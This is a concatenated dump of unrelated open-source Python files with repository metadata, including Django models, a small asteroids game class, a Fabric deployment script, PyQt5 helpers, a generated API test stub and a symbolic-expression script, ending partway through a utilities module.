20bdec0d5bd5b987f0ea7fa1bd7a366e3ad602c9 | 4fe0726ad41024f99e969c2e73861badd907e23d | /TestAndOtherProgramsToPlayWithVSCode/hello.py | 5fb19379ebaad1ef6df2a486bf8f805b359de2cb | [] | no_license | bhattner143/StentResultCompilationForESR | ab8116a32d8bf66aea536b7e25f05980250a7ee3 | 1536c471ef099206c0aeb1c065288283b723b6a7 | refs/heads/master | 2020-08-01T10:13:53.277877 | 2019-09-26T00:18:37 | 2019-09-26T00:18:37 | 210,961,048 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 43 | py | msg = "Hello World"
print(msg)
import sys
| [
"dipankarbhattacharya@wifi-staff-172-24-62-35.net.auckland.ac.nz"
] | dipankarbhattacharya@wifi-staff-172-24-62-35.net.auckland.ac.nz |
e4db636c96c7c98f7cde1d8fff7c3cbc6e56d138 | ed7412b75887753c4b4a37b134e7b869d183514b | /taxProject/tax/models.py | 67c187744095194b4346c03291066e3bb4bb72f5 | [] | no_license | alison990222/pwc-tax-project | 4ad73dbcc3f2330bf6d4919ee515887b97fa3b2b | c065ad4d1468262ffbdbd2e959cbcf1231dc2a69 | refs/heads/master | 2023-02-24T23:36:07.836691 | 2021-01-17T15:34:58 | 2021-01-17T15:34:58 | 278,887,740 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,152 | py | from django.db import models
class TaxDatabase(models.Model):
# 商品编码
code = models.CharField(max_length=30)
# 大类
firstCategory = models.CharField(max_length=60, null=True, default=None)
# 大类id
FirstCategoryID = models.CharField(max_length=30, null=True, default=None)
# 小类
secondCategory = models.CharField(max_length=60, null=True, default=None)
# 小类id
SecondCategoryID = models.CharField(max_length=30, null=True, default=None)
# info
info = models.CharField(max_length=3000, null=True, default=None)
class itemDatabase(models.Model):
# item
item = models.CharField(max_length=1000, null=True, default=None)
# 商品编码
itemCode = models.CharField(max_length=30)
# 大类
itemFirstCategory = models.CharField(max_length=60, null=True, default=None)
# 大类id
itemFirstCategoryID = models.CharField(max_length=30, null=True, default=None)
# 小类
itemSecondCategory = models.CharField(max_length=60, null=True, default=None)
# 小类id
itemSecondCategoryID = models.CharField(max_length=30, null=True, default=None)
| [
"zhangxt0222@163.com"
] | zhangxt0222@163.com |
4ed23754e991aa7060ba6eb0d47ad7a5ae3e4dfc | eb7d96d3c02c36d3c7a4c1714aa04bd3c4fa0906 | /torpedo.py | ac598aaaad211e28e34ce116c421b4612229e1e8 | [] | no_license | dor-roter/asteroids | b7b3a5b483453ac9ff026da799080e782a238bb1 | 34a57bd38ea7021c7bfa6d1317317f49b99a2baa | refs/heads/master | 2020-12-03T16:08:29.395427 | 2020-01-05T16:19:38 | 2020-01-05T16:19:38 | 231,384,169 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,100 | py | ################################################
# File: torpedo.py
# Writer: Asif Kagan, Dor Roter
# Login: asifka, dor.roter
# Exercise: ------
# More:
# Consulted: -----
# Internet:
# Notes:
################################################
from game_object import GameObject
import math
class Torpedo(GameObject):
"""
A class extending GameObject describing a torpedo in our game
"""
# public static constants
RADIUS = 4
LIFE_SPAN = 200
def __init__(self, ship):
"""
Constructor method to generate a torpedo
:param ship: the launching ship
:type ship: Ship
"""
self.__heading = ship.get_heading()
speed_vec = self.__calc_speed(ship.get_speed())
super().__init__(ship.get_coordinates(), speed_vec, Torpedo.RADIUS)
self.__time_alive = 0
def get_heading(self):
"""
Method to get the torpedos heading
:return: int
"""
return self.__heading
def get_draw_data(self):
"""
Method to get a tuple representing all necessary data for a draw.
:return: Tuple (int, int, int)
"""
x, y = self._coordinates
return x, y, self.__heading
def time_tick(self):
"""
Method to count the torpedos time alive.
:return: bool
True - still alive
False - timer ran out, the torpedo blew up
"""
self.__time_alive += 1
return self.__time_alive <= Torpedo.LIFE_SPAN
def __calc_speed(self, ship_speed):
"""
Private util function to calculate the torpedos speed based on the
launching ship speed.
:param ship_speed: a tuple representing the launching ships x,y
initial speed
:type ship_speed: Tuple: (int, int)
:return: Tuple: (int, int)
"""
ship_x, ship_y = ship_speed
rad_heading = math.radians(self.__heading)
x_speed = ship_x + 2*math.cos(rad_heading)
y_speed = ship_y + 2*math.sin(rad_heading)
return x_speed, y_speed
| [
"dor.roter.10@gmail.com"
] | dor.roter.10@gmail.com |
7dcb2f9b496fcb6212835db99ece1469a3157641 | ab09e8ad44fdaf7ccd27087d981c21fbdac85c00 | /python_tutor/09_two-dimensional_arrays/swap.py | 80ee53ac75e8f381a2d3eb34c03938e025d46e4c | [
"Apache-2.0"
] | permissive | sunnychemist/pylearn | bf96fc2b9c247c69fbcb9e1927ef0d90ee5994a0 | 29566b75c14f867bd7e8fc19c236e9be4f9f5203 | refs/heads/master | 2022-11-10T03:43:43.825472 | 2020-06-15T23:41:24 | 2020-06-15T23:41:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 356 | py | def swap_columns(a, i, j):
print('start: ')
for row in a:
print(row)
for y in range(len(a[1])):
for x in range(len(a)):
if y == i:
a[x][i], a[x][j] = a[x][j], a[x][i]
print('end: ')
for row in a:
print(row)
swap_columns([[11, 12, 13, 14], [21, 22, 23, 24], [31, 32, 33, 34]], 0, 1)
| [
"ctatuk@gmail.com"
] | ctatuk@gmail.com |
6cec9f70eb042e0d9c6ea3ff9e3719cc9f63c302 | 1f45d93123c6d40bab4b783670e41d8eb8f6ae6c | /day2-lunch/day2-exercise-2.py | 50125b91217f1636cc04d9e8dffd4051be989316 | [] | no_license | JTdeKay/qbb2018-answers | fd19bf137f92c820fd3ee9c529e7420b256d3105 | 75189fa89b3a356b8abc689e5cc26060256031e2 | refs/heads/master | 2021-07-15T20:32:16.622415 | 2019-01-01T16:02:10 | 2019-01-01T16:02:10 | 146,313,657 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 462 | py | #!/usr/bin/env python3
import sys
if len(sys.argv) > 1:
f = open( sys.argv[1] )
else:
f = sys.stdin
count =0
for i, line in enumerate( f ):
if line[0] == "@":
continue
if "NM:i:0" in line:
count += 1
print(count)
# if count >10:
# break
# fields = line.rstrip("\r\n").split("\t")
# tx_len = int(fields[4]) - int(fields[3])
# if tx_len > 10000:
# print( fields[5], tx_len ) | [
"jdekay1@jhu.edu"
] | jdekay1@jhu.edu |
d2aa6ff19836d34ff0dab5a45d47cf65bd7f3324 | 02802ecfff8639edc093068da740ded8ee8228aa | /test/test_inline_object8.py | 4de4d72fa7c421eec5426415f92be8159709b6ab | [] | no_license | mintproject/data-catalog-client | 0fc406c2063864144a9a995e98724144b43feb66 | 22afd6341e5f66594c88134834d58e4136e4983a | refs/heads/master | 2020-12-08T21:56:02.785671 | 2020-05-13T03:53:51 | 2020-05-13T03:53:51 | 233,105,679 | 1 | 1 | null | 2020-05-13T03:53:53 | 2020-01-10T18:17:55 | Python | UTF-8 | Python | false | false | 873 | py | # coding: utf-8
"""
MINT Data Catalog
API Documentation for MINT Data Catalog # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: danf@usc.edu
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datacatalog
from datacatalog.models.inline_object8 import InlineObject8 # noqa: E501
from datacatalog.rest import ApiException
class TestInlineObject8(unittest.TestCase):
"""InlineObject8 unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testInlineObject8(self):
"""Test InlineObject8"""
# FIXME: construct object with mandatory attributes with example values
# model = datacatalog.models.inline_object8.InlineObject8() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"maxiosorio@gmail.com"
] | maxiosorio@gmail.com |
c72d3ee6684effa92d2cbf6f72daa15c513d5c2f | 4ce9ee078156d3bac04ddd95b664f7e3a76936c3 | /DjangoApp/admin.py | ad84aa3e6daec96bb72bc33295ab75e2038d5eeb | [] | no_license | rashinanwani/Django-NotesApp | c75d6674da29921243a46eb35dbc6d27e69e87d6 | d3784da6b4824d65927a9142544803a8d6aa8414 | refs/heads/master | 2022-12-28T07:04:54.024809 | 2020-10-18T21:36:35 | 2020-10-18T21:36:35 | 303,507,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 440 | py | from django.contrib import admin
from .models import table1
from .models import viewnotes
# Register your models here.
admin.site.register(table1)
admin.site.register(viewnotes)
# Register the admin class with the associated model
# admin.site.register(table2)
# # Define the admin class
# class AuthorAdmin(admin.ModelAdmin):
# pass
# # Register the admin class with the associated model
# admin.site.register(Author, AuthorAdmin)
| [
"rashi.nanwani2000@gmail.com"
] | rashi.nanwani2000@gmail.com |
2fe12a441312c3fc3ef7a59835ec534a37ad8515 | 82c5f8e65fb60b179e3adcc2c0525d821a5298d2 | /Module 6/01_nodes_create.py | 57312d77edc7cafe6f7c2b68081567fc78f69d11 | [] | no_license | AnnaZhuravleva/Specialist_Python_2 | 6009357ccf694507c6fc93daf69129831639aa8b | fcde1dcc8c70376dc8c6ae8591c50fcb65bac327 | refs/heads/main | 2023-07-10T23:12:16.051455 | 2021-07-29T21:12:07 | 2021-07-29T21:12:07 | 386,949,322 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 746 | py | class Node:
"""
Класс для узла списка. Хранит значение и указатель на следующий узел.
"""
def __init__(self, value=None, next=None):
self.value = value
self.next = next
# Создаем ноды(узлы)
node0 = Node("Иван")
node1 = Node("Алекс")
node2 = Node("Петр")
node3 = Node("Анна")
node4 = Node("Кирилл")
# TODO: Добавьте еще несколько нод с именами
# Связываем ноды
node0.next = node1
node1.next = node2
node2.next = node3
node3.next = node4
current_node = node0
while current_node:
print(current_node.value)
current_node = current_node.next
| [
"noreply@github.com"
] | AnnaZhuravleva.noreply@github.com |
ad162c4e98bd7aa84c852f1952f25d97c3b9fc78 | 6c155ae12169c32ab7027d3cc32c18c1e02f07ac | /question6.py | 9903946fc7a7d586b54cd8e41029cff807d924ff | [] | no_license | fengshixiang/Target-Offer | e067f3baa30bc13f63db6c21c86c7751e8c500e3 | 473fb244099b77348a565e4b513efd8f3c72ef1e | refs/heads/main | 2023-03-24T09:44:21.408827 | 2021-03-14T14:07:39 | 2021-03-14T14:07:39 | 346,281,507 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 437 | py | # -*- coding:utf-8 -*-
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
# 返回从尾部到头部的列表值序列,例如[1,2,3]
def printListFromTailToHead(self, listNode):
# write code here
l = []
while listNode is not None:
l.append(listNode.val)
listNode = listNode.next
l = l[::-1]
return l | [
"1150415892@qq.com"
] | 1150415892@qq.com |
c8e9a6df4de37b414ea033965c80120dab0b6e57 | d36975caedab71aaaac26156105afaf59448e445 | /机器人传感系统/2.超声波距离传感器/读取距离数据_RestfulAPI.py | 00db909c44b8986e49e69f50e5f9072b82fad478 | [
"MIT"
] | permissive | mukgong/AI-robot | 3d84b444ac8d1a0cdb061eda19bb9319c9af036e | f89d91b67705878d9e87ae09a35b436495b66707 | refs/heads/master | 2022-12-25T01:07:37.174852 | 2020-10-05T01:44:50 | 2020-10-05T01:44:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 500 | py | import requests
import json
def get_sensor():
sensor_url = "http://127.0.0.1:9090/v1/sensors/ultrasonic"
headers={'Content-Type':'application/json'}
response=requests.get(url=sensor_url, headers=headers)
print (response.content)
res = json.loads(response.content)
if (len(res["data"])>0):
print ("ultrasonic id = %d : value = %d "%(res["data"]["ultrasonic"][0]["id"],res["data"]["ultrasonic"][0]["value"]))
if __name__ == '__main__':
get_sensor() | [
"960751327@qq.com"
] | 960751327@qq.com |
fe21e112704ef230f20ffef161f404b28e8a20b9 | 45547c76b36446d6e8d29bce24f080ae7656b123 | /enev/Lib/site-packages/PyQt5/uic/port_v2/as_string.py | 556fcc0f61c752c8b57047cb5d5ddc9fb7159932 | [] | no_license | Flionay/PyQt5- | e2a0d53eef6646c7a3140ca63bb6d75429f10703 | 2b2b2b71fffd89207a67a19c81a0ce5315699447 | refs/heads/master | 2020-12-22T21:17:09.440196 | 2020-01-30T14:48:39 | 2020-01-30T14:48:39 | 236,932,533 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,475 | py | #############################################################################
##
## Copyright (c) 2020 Riverbank Computing Limited <info@riverbankcomputing.com>
##
## This file is part of PyQt5.
##
## This file may be used under the terms of the GNU General Public License
## version 3.0 as published by the Free Software Foundation and appearing in
## the file LICENSE included in the packaging of this file. Please review the
## following information to ensure the GNU General Public License version 3.0
## requirements will be met: http://www.gnu.org/copyleft/gpl.html.
##
## If you do not wish to use this file under the terms of the GPL version 3.0
## then you may purchase a commercial license. For more information contact
## info@riverbankcomputing.com.
##
## This file is provided AS IS with NO WARRANTY OF ANY KIND, INCLUDING THE
## WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
##
#############################################################################
import re
def as_string(obj):
if isinstance(obj, basestring):
return '"' + _escape(obj.encode('UTF-8')) + '"'
return str(obj)
_esc_regex = re.compile(r"(\"|\'|\\)")
def _escape(text):
# This escapes any escaped single or double quote or backslash.
x = _esc_regex.sub(r"\\\1", text)
# This replaces any '\n' with an escaped version and a real line break.
return re.sub(r'\n', r'\\n"\n"', x)
| [
"angyi_jq@163.com"
] | angyi_jq@163.com |
4e18bb629d0cf47b38d4f4e6bcbfd8840cd16497 | 84abce44bd0278fa99e9556168290675f399834c | /EcalAlCaRecoProducers/config/reRecoTags/pulseShapeStudy_m100.py | 1130a38c27fbf75c327984fb96b19892b85b5ca7 | [] | no_license | ECALELFS/ECALELF | 7c304c6b544b0f22a4b62cf942f47fa8b58abef0 | 62a046cdf59badfcb6281a72923a0f38fd55e183 | refs/heads/master | 2021-01-23T13:36:31.574985 | 2017-06-22T12:26:28 | 2017-06-22T12:26:28 | 10,385,620 | 1 | 9 | null | 2017-06-30T12:59:05 | 2013-05-30T15:18:55 | C++ | UTF-8 | Python | false | false | 2,240 | py | import FWCore.ParameterSet.Config as cms
from CondCore.DBCommon.CondDBSetup_cfi import *
RerecoGlobalTag = cms.ESSource("PoolDBESSource",
CondDBSetup,
connect = cms.string('frontier://FrontierProd/CMS_CONDITIONS'),
globaltag = cms.string('74X_dataRun2_Prompt_v2'),
toGet = cms.VPSet(
cms.PSet(record = cms.string("EcalIntercalibConstantsRcd"),
tag = cms.string("EcalIntercalibConstants_2012ABCD_offline"),
connect = cms.untracked.string("frontier://FrontierProd/CMS_COND_31X_ECAL"),
),
cms.PSet(record = cms.string("EcalPulseShapesRcd"),
tag = cms.string("EcalPulseShapes_data"),
connect = cms.untracked.string("sqlite_file:/afs/cern.ch/cms/CAF/CMSALCA/ALCA_ECALCALIB/pulseShapes/ecaltemplates_popcon_timeShifted_-1p000000ns.db"),
),
cms.PSet(record = cms.string("EBAlignmentRcd"),
tag = cms.string("EBAlignment_measured_v10_offline"),
connect = cms.untracked.string("frontier://FrontierProd/CMS_CONDITIONS"),
),
cms.PSet(record = cms.string("EEAlignmentRcd"),
tag = cms.string("EEAlignment_measured_v10_offline"),
connect = cms.untracked.string("frontier://FrontierProd/CMS_CONDITIONS"),
),
cms.PSet(record = cms.string("ESAlignmentRcd"), # only Bon!
tag = cms.string("ESAlignment_measured_v08_offline"),
connect = cms.untracked.string("frontier://FrontierProd/CMS_CONDITIONS"),
),
)
)
| [
"shervin.nourbakhsh@cern.ch"
] | shervin.nourbakhsh@cern.ch |
28058e366e9d750aaab587835e0cab482b1cfbc9 | 1aa44db2eb5bc0d5be21e54e3ca1f4918d5d84bf | /fabfile/servers.py | 46fd9f14a872917968e1ada16b0b196477e3cc44 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | nprapps/commencement | a2aea873704120aa8249854a1d12798f1a4b1153 | 3f8642225d1910807e6419e95fafd5e0f21fbbac | refs/heads/master | 2021-07-22T00:25:36.353670 | 2021-06-16T22:56:56 | 2021-06-16T22:56:56 | 19,289,147 | 1 | 2 | null | 2015-07-03T22:44:28 | 2014-04-29T19:36:14 | JavaScript | UTF-8 | Python | false | false | 8,460 | py | #!/usr/bin/env python
"""
Commands work with servers. (Hiss, boo.)
"""
import copy
from fabric.api import local, put, settings, require, run, sudo, task
from fabric.state import env
from jinja2 import Template
import app_config
"""
Setup
"""
@task
def setup():
"""
Setup servers for deployment.
This does not setup services or push to S3. Run deploy() next.
"""
require('settings', provided_by=['production', 'staging'])
require('branch', provided_by=['stable', 'master', 'branch'])
if not app_config.DEPLOY_TO_SERVERS:
print 'You must set DEPLOY_TO_SERVERS = True in your app_config.py before setting up the servers.'
return
install_google_oauth_creds()
create_directories()
create_virtualenv()
clone_repo()
checkout_latest()
install_requirements()
setup_logs()
def create_directories():
"""
Create server directories.
"""
require('settings', provided_by=['production', 'staging'])
run('mkdir -p %(SERVER_PROJECT_PATH)s' % app_config.__dict__)
run('mkdir -p /var/www/uploads/%(PROJECT_FILENAME)s' % app_config.__dict__)
def create_virtualenv():
"""
Setup a server virtualenv.
"""
require('settings', provided_by=['production', 'staging'])
run('virtualenv -p %(SERVER_PYTHON)s %(SERVER_VIRTUALENV_PATH)s' % app_config.__dict__)
run('source %(SERVER_VIRTUALENV_PATH)s/bin/activate' % app_config.__dict__)
def clone_repo():
"""
Clone the source repository.
"""
require('settings', provided_by=['production', 'staging'])
run('git clone %(REPOSITORY_URL)s %(SERVER_REPOSITORY_PATH)s' % app_config.__dict__)
if app_config.REPOSITORY_ALT_URL:
run('git remote add bitbucket %(REPOSITORY_ALT_URL)s' % app_config.__dict__)
@task
def checkout_latest(remote='origin'):
"""
Checkout the latest source.
"""
require('settings', provided_by=['production', 'staging'])
require('branch', provided_by=['stable', 'master', 'branch'])
run('cd %s; git fetch %s' % (app_config.SERVER_REPOSITORY_PATH, remote))
run('cd %s; git checkout %s; git pull %s %s' % (app_config.SERVER_REPOSITORY_PATH, env.branch, remote, env.branch))
@task
def install_requirements():
"""
Install the latest requirements.
"""
require('settings', provided_by=['production', 'staging'])
run('%(SERVER_VIRTUALENV_PATH)s/bin/pip install -U -r %(SERVER_REPOSITORY_PATH)s/requirements.txt' % app_config.__dict__)
run('cd %(SERVER_REPOSITORY_PATH)s; npm install' % app_config.__dict__)
@task
def setup_logs():
"""
Create log directories.
"""
require('settings', provided_by=['production', 'staging'])
sudo('mkdir %(SERVER_LOG_PATH)s' % app_config.__dict__)
sudo('chown ubuntu:ubuntu %(SERVER_LOG_PATH)s' % app_config.__dict__)
@task
def install_crontab():
"""
Install cron jobs script into cron.d.
"""
require('settings', provided_by=['production', 'staging'])
sudo('cp %(SERVER_REPOSITORY_PATH)s/crontab /etc/cron.d/%(PROJECT_FILENAME)s' % app_config.__dict__)
@task
def uninstall_crontab():
"""
Remove a previously install cron jobs script from cron.d
"""
require('settings', provided_by=['production', 'staging'])
sudo('rm /etc/cron.d/%(PROJECT_FILENAME)s' % app_config.__dict__)
@task
def install_google_oauth_creds():
"""
Install Google Oauth credentials file (global) from workinprivate repo
"""
run('git clone git@github.com:nprapps/workinprivate.git /tmp/workinprivate-tmp')
run('cp /tmp/workinprivate-tmp/.google_oauth_credentials %s' % OAUTH_CREDENTIALS_PATH)
run('rm -Rf /tmp/workinprivate-tmp')
@task
def remove_google_oauth_creds():
"""
Remove Google oauth credentials file (global)
"""
run('rm %s' % OAUTH_CREDENTIALS_PATH)
def delete_project():
"""
Remove the project directory. Invoked by shiva.
"""
run('rm -rf %(SERVER_PROJECT_PATH)s' % app_config.__dict__)
"""
Configuration
"""
def _get_template_conf_path(service, extension):
"""
Derive the path for a conf template file.
"""
return 'confs/%s.%s' % (service, extension)
def _get_rendered_conf_path(service, extension):
"""
Derive the rendered path for a conf file.
"""
return 'confs/rendered/%s.%s.%s' % (app_config.PROJECT_FILENAME, service, extension)
def _get_installed_conf_path(service, remote_path, extension):
"""
Derive the installed path for a conf file.
"""
return '%s/%s.%s.%s' % (remote_path, app_config.PROJECT_FILENAME, service, extension)
def _get_installed_service_name(service):
"""
Derive the init service name for an installed service.
"""
return '%s.%s' % (app_config.PROJECT_FILENAME, service)
@task
def render_confs():
"""
Renders server configurations.
"""
require('settings', provided_by=['production', 'staging'])
with settings(warn_only=True):
local('mkdir confs/rendered')
# Copy the app_config so that when we load the secrets they don't
# get exposed to other management commands
context = copy.copy(app_config.__dict__)
context.update(app_config.get_secrets())
for service, remote_path, extension in app_config.SERVER_SERVICES:
template_path = _get_template_conf_path(service, extension)
rendered_path = _get_rendered_conf_path(service, extension)
with open(template_path, 'r') as read_template:
with open(rendered_path, 'wb') as write_template:
payload = Template(read_template.read())
write_template.write(payload.render(**context))
@task
def deploy_confs():
"""
Deploys rendered server configurations to the specified server.
This will reload nginx and the appropriate uwsgi config.
"""
require('settings', provided_by=['production', 'staging'])
render_confs()
with settings(warn_only=True):
for service, remote_path, extension in app_config.SERVER_SERVICES:
rendered_path = _get_rendered_conf_path(service, extension)
installed_path = _get_installed_conf_path(service, remote_path, extension)
a = local('md5 -q %s' % rendered_path, capture=True)
b = run('md5sum %s' % installed_path).split()[0]
if a != b:
print 'Updating %s' % installed_path
put(rendered_path, installed_path, use_sudo=True)
if service == 'nginx':
sudo('service nginx reload')
elif service == 'uwsgi':
service_name = _get_installed_service_name(service)
sudo('initctl reload-configuration')
sudo('service %s restart' % service_name)
elif service == 'app':
run('touch %s' % app_config.UWSGI_SOCKET_PATH)
sudo('chmod 644 %s' % app_config.UWSGI_SOCKET_PATH)
sudo('chown www-data:www-data %s' % app_config.UWSGI_SOCKET_PATH)
else:
print '%s has not changed' % rendered_path
@task
def nuke_confs():
"""
DESTROYS rendered server configurations from the specified server.
This will reload nginx and stop the uwsgi config.
"""
require('settings', provided_by=['production', 'staging'])
for service, remote_path, extension in app_config.SERVER_SERVICES:
with settings(warn_only=True):
installed_path = _get_installed_conf_path(service, remote_path, extension)
sudo('rm -f %s' % installed_path)
if service == 'nginx':
sudo('service nginx reload')
elif service == 'uwsgi':
service_name = _get_installed_service_name(service)
sudo('service %s stop' % service_name)
sudo('initctl reload-configuration')
elif service == 'app':
sudo('rm %s' % app_config.UWSGI_SOCKET_PATH)
"""
Fabcasting
"""
@task
def fabcast(command):
"""
Actually run specified commands on the server specified
by staging() or production().
"""
require('settings', provided_by=['production', 'staging'])
if not app_config.DEPLOY_TO_SERVERS:
print 'You must set DEPLOY_TO_SERVERS = True in your app_config.py and setup a server before fabcasting.'
run('cd %s && bash run_on_server.sh fab %s $DEPLOYMENT_TARGET %s' % (app_config.SERVER_REPOSITORY_PATH, env.branch, command))
| [
"davideads@gmail.com"
] | davideads@gmail.com |
b672d74dc3ade9ca857ed2b97d2a8bc96d25a527 | d78989a8ce52a98f48d77228c4ea893f7aae31f7 | /symbolic_expressions/sample15-virt-bogus-loop-iterations-2.py | 80503fc33404de03c7ff542b5ba14a32feb2dee4 | [] | no_license | llyuer/Tigress_protection | 78ead2cf9979a7b3287175cd812833167d520244 | 77c68c4c949340158b855561726071cfdd82545f | refs/heads/master | 2020-06-17T11:16:40.078433 | 2019-04-16T09:27:29 | 2019-04-16T09:27:29 | 195,908,093 | 1 | 0 | null | 2019-07-09T01:14:06 | 2019-07-09T01:14:06 | null | UTF-8 | Python | false | false | 1,086 | py | #!/usr/bin/env python2
## -*- coding: utf-8 -*-
import sys
def sx(bits, value):
sign_bit = 1 << (bits - 1)
return (value & (sign_bit - 1)) - (value & sign_bit)
SymVar_0 = int(sys.argv[1])
ref_342 = SymVar_0
ref_353 = ref_342 # MOV operation
ref_365 = ref_353 # MOV operation
ref_367 = ref_365 # MOV operation
ref_331345 = ref_367 # MOV operation
ref_331357 = ref_331345 # MOV operation
ref_331403 = ref_331345 # MOV operation
ref_331447 = ref_331345 # MOV operation
ref_331534 = (((rol(0xE, (rol(0xE, ((((((((((((0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) + ref_331357) & 0xFFFFFFFFFFFFFFFF) + 0x1F3D5B79) & 0xFFFFFFFFFFFFFFFF)) ^ ref_331403)) ^ 0x1F3D5B79) + ref_331447) & 0xFFFFFFFFFFFFFFFF) # MOV operation
ref_527456 = ref_331534 # MOV operation
ref_592749 = ref_527456 # MOV operation
ref_788657 = ref_592749 # MOV operation
ref_853947 = ref_788657 # MOV operation
ref_853985 = ref_853947 # MOV operation
ref_853997 = ref_853985 # MOV operation
ref_853999 = ref_853997 # MOV operation
print ref_853999 & 0xffffffffffffffff
| [
"jonathan.salwan@gmail.com"
] | jonathan.salwan@gmail.com |
8e823ccea7c9273bc5229ca6fc751b7284fb8a1b | 469ebcca765fb37ecfc459fcb618b0925e9b9f93 | /cloudera_roles_service_cluster_check.py | a26821c0a6e66254cf4b1ccf5ec84c18a6220aaa | [] | no_license | abha10/cloudera_monitors | b4d55ad18e9d698f90721c730ff5d9afcaa3b3fc | d53b6ece2cff08951925129e7922deac497f3c74 | refs/heads/master | 2020-06-23T23:01:55.243530 | 2019-07-25T07:19:56 | 2019-07-25T07:19:56 | 198,778,986 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,669 | py | #!/usr/bin/python
import ConfigParser, json, time, sys
from cm_api.api_client import ApiResource
from cm_api.endpoints.services import ApiService
# Prep for reading config props from external file
CONFIG = ConfigParser.ConfigParser()
CONFIG.read("/etc/onlinesales/config/configCloudera.ini")
# This is the host that the Cloudera Manager server is running on
CM_HOST = CONFIG.get("CM", "cm.host")
# CM admin account info
ADMIN_USER = CONFIG.get("CM", "admin.name")
ADMIN_PASS = CONFIG.get("CM", "admin.password")
#### Cluster Definition #####
CLUSTER_NAME = CONFIG.get("CM", "cluster.name")
CDH_VERSION = "CDH5"
unhealthy_roles = []
def restart_role(service, API):
try:
for host in API.get_all_hosts(view='full'):
arr_len = len(host.roleRefs)
count = 0
i = 0
while i < arr_len:
count = 0
while host.roleRefs[i].serviceName == service.name and service.get_role(host.roleRefs[i].roleName).healthSummary != "GOOD" and count < 2:
print "RESTARTING "+ service.name+" ROLE - "+host.roleRefs[i].roleName + " on "+ host.hostname
cmd = service.restart_roles(host.roleRefs[i].roleName)
time.sleep(180)
count +=1
print "ROLE STATE: " + host.roleRefs[i].roleName + " - " + service.get_role(host.roleRefs[i].roleName).healthSummary
#### Check whether role has started successfully or not.
if host.roleRefs[i].serviceName == service.name and (count >= 2 or service.get_role(host.roleRefs[i].roleName).healthSummary != "GOOD"):
unhealthy_roles.append(host.roleRefs[i].roleName)
i += 1
except Exception as api_ex:
print api_ex
exit(2)
def restart_service(service, api):
try:
count = 0;
while (service.healthSummary != "GOOD" and count < 2):
cmd = service.restart().wait()
count +=1
#### Check if service has started successfully or not
if (count >=2 and service.healthSummary != "GOOD" ):
print "Unable to restart Service: "+ service.name
restart_cluster(api)
else:
print service.name +" service state: " + service.healthSummary
except Exception as ex:
print ex
exit(2)
def restart_cluster(API):
try:
# Get Cluster Health Status
CLUSTER = API.get_cluster(CLUSTER_NAME)
count = 0
while (CLUSTER.entityStatus != "GOOD_HEALTH" and count < 2):
print "About to restart cluster."
CLUSTER.restart().wait()
print "Done restarting cluster."
count +=1
if (CLUSTER.entityStatus != "GOOD_HEALTH" and count >= 2):
print "Unable to restart cluster - " + CLUSTER.name
exit(2)
else:
print CLUSTER_NAME+ " CLUSTER STATE: " + CLUSTER.entityStatus
exit(0)
except Exception as api_ex:
print api_ex
exit(2)
### Main function ###
def main():
API = ApiResource(CM_HOST, version=16, username=ADMIN_USER, password=ADMIN_PASS)
for c in API.get_all_clusters():
if c.version == "CDH5":
cdh5 = c
for s in cdh5.get_all_services():
restart_role(s,API)
if (unhealthy_roles == []):
print("ALL ROLES: OK")
else:
print("Following is the list of all unhealthy Roles:\n ")
for role in unhealthy_roles:
print("\n\t\t" + role)
for s in cdh5.get_all_services():
restart_service(s,API)
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | abha10.noreply@github.com |
894e55b082cb3914fb996ae8d5cc3b0edd1bb781 | 24706d3bf851a5217b39dbe32b11f4a149f30192 | /ImageNet/networks/model_list/__init__.py | a18f944713b7558d6e360a01fae51399cdaa227d | [] | no_license | MariusAnje/SEU_NNFailure | 23375eb3e262a2915628ef2c872347f81fb860df | 8fadb8f213505eda83ae90abbe1ed9a0233a8fd8 | refs/heads/master | 2020-04-12T17:54:53.665859 | 2018-12-21T04:03:34 | 2018-12-21T04:03:34 | 162,661,885 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28 | py | from alexnet import alexnet
| [
"jiecaoyu@umich.edu"
] | jiecaoyu@umich.edu |
902f96abdf7d52b75cb5bc40474b9d4d91c7c31e | c8566cf1c90de5ee22fd7a57a07b4c93ea8efbe1 | /code_search/notebooks/general_utils.py | 0560a43a7effbe90c3b076d5bb529d3dba0aa6b7 | [
"MIT",
"Python-2.0"
] | permissive | prasad-adi/deep-code-search-preprocessing | 86de50088c6d7c409b063c8a73c84df4f1a8afcb | 9331566455dbda10a65f67e64ba72c4158c75c61 | refs/heads/master | 2020-05-05T12:43:08.353401 | 2019-04-07T23:53:48 | 2019-04-07T23:53:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,271 | py | import logging
import pickle
from itertools import chain
from math import ceil
from pathlib import Path
from typing import List, Callable, Any
import nmslib
import wget
from more_itertools import chunked
from pathos.multiprocessing import Pool, cpu_count
def save_file_pickle(fname: str, obj: Any):
with open(fname, 'wb') as f:
pickle.dump(obj, f)
def load_file_pickle(fname: str):
with open(fname, 'rb') as f:
obj = pickle.load(f)
return obj
def read_training_files(data_path: str):
"""
Read data from directory
"""
PATH = Path(data_path)
with open(PATH / 'train.function', 'r') as f:
t_enc = f.readlines()
with open(PATH / 'valid.function', 'r') as f:
v_enc = f.readlines()
